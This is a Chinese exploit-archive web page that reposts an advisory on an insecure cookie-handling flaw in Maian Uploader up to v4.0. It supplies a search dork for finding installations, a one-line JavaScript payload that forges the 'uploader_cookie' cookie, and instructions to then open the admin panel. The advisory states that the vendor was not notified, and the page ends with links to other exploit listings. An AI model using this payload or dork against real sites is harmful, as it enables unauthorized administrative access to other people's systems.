手机
当前位置:查字典教程网 >网络安全 >Exploit >Maian Uploader
Maian Uploader
摘要:-[*]==================================================================...

-[*] ================================================================================ [*]-

-[*] Maian Uploader <= v4.0 Insecure Cookie Handling Vulnerability [*]-

-[*] ================================================================================ [*]-

[*] Discovered By: S.W.A.T.

[*] E-Mail: svvateam[at]yahoo[dot]com

[*] Script Download: http://www.maianscriptworld.co.uk

[*] DORK: Powered by: Maian Uploader v4.0

[*] Vendor Has Not Been Notified!

[*] DESCRIPTION:

Maian Uploader suffers from a insecure cookie, the admin panel only checks if the cookie

exists.

and not the content. so we can easyily craft a cookie and look like a admin.

[*] Vulnerability:

javascript:document.cookie = "uploader_cookie=1; path=/";

[*] NOTE/TIP:

after running the javascript, visit "/admin/index.php" to view admin area.

-[*] ================================================================================ [*]-

-[*] Maian Uploader <= v4.0 Insecure Cookie Handling Vulnerability [*]-

-[*] ================================================================================ [*]-

【Maian Uploader】相关文章:

phsBlog 0.2 Bypass SQL Injection Filtering Exploit

PhotoPost vBGallery 2.4.2 Arbitrary File Upload Vulnerability

FlashGet 1.9.0.1012 (FTP PWD Response) BOF Exploit (safeseh)

tplSoccerSite 1.0 Multiple Remote SQL Injection Vulnerabilities

MS Windows (.doc File) Malformed Pointers Denial of Service Exploit

Maian Guestbook

Pragyan CMS 2.6.2 (sourceFolder) Remote File Inclusion Vulnerability

Maian Search

Maian Recipe

jSite 1.0 OE (SQL/LFI) Multiple Remote Vulnerabilities

上一篇: Safari Quicktime
精品推荐
分类导航